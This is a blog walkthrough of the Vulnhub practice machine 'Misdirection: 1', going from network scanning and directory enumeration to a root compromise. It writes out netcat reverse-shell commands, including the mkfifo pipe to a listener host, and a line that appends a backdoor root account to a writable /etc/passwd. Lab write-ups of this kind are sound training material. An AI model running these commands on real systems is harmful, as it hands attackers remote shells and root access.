Misdirection: 1 Vulnhub Walkthrough

Bymihir

 

Misdirection is a vulnerable machine made by FalconSpy to help OSCP students strengthen and practice their skills for the exam.
We start by importing the VM into our Virtualisation software and get it running.
Leave this untouched now.

Network scanning and information gathering:
Now we come back to our Kali OS and start netdiscover to find out the IP of our target.

netdiscover 192.168.1.0/24

Now we know the IP, we can use NMAP to scan for open ports and services running on the target machine.

 

We see the following information which can be of use to us:
1.      Port 80 running Rocket httpd service
2.      Port 22 open; openSSH 7.6 running
3.      Port 3306 MySQL
4.      Port 8080 appache httpd running
Enumeration:

Port 80 is open, so there’d be some web-page present. Let’s try it out.

 

There’s nothing much in here. One thing of interest is signup page, but that turned out just to be a “misdirection”
There was 8080 also up, so let’s try that out. It lands us on Apache default page. Another “misdirection”

 

 

Now we use Dirb to see if can find something else on this.

 

 

The results are surprising. Following are the directories which can be of interest:
1.      ../debug/
2.      ../shell/
3.      ../wordpress/

While WordPress and shell turned out to be another “misdirection”, Debug gave us a virtual shell.

 

 

Now try to take netcat shell

First run netcat listener on your machine.

nc -lnvp 1234

Now to gain reverse connection, run the following command on debug page

nc -e /bin/sh 192.168.1.13 1234

We see that the version of netcat running on target doesn’t support the e
There’s another way to do it

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.13 1234 >/tmp/f

So we get netcat shell now as seen below.

 

now while exploring I found that a folder named Brexit is there in home directory which contains user.txt. this file is not accessible with the permission we have on this user.

 

 

so let’s try to switch user to brexit

 sudo -u Brexit /bin/bash

Now let’s see what we can do with this user.

We can access the user.txt

 

Let’s check in the etc folder. We find that the user Brexit has permission to read write the passwd file.

Privilege Escalation:

We will try to exploit this vulnerability and try to echo a malicious user into the file with root permissions.
First create a password using openssl

open passwd -1

echo ‘hacker: $1$VXadjjB/$bNNkCGCGJJG9gSF3AQqZm0:0:0::/root:/bin/bash’ >>/etc/passwd

now su into user hacker and you will get root access.

 

 

Similar Posts

Google XSS Game

Bymihir

So Google has this xss game where you can practice or test your xss vulnerability skills. You will have to make your own xss payloads as per the scenario of the task and get through the levels. I have just found out this website and I’ll try to do it and post my solutions with…

Leave a Reply

Your email address will not be published. Required fields are marked *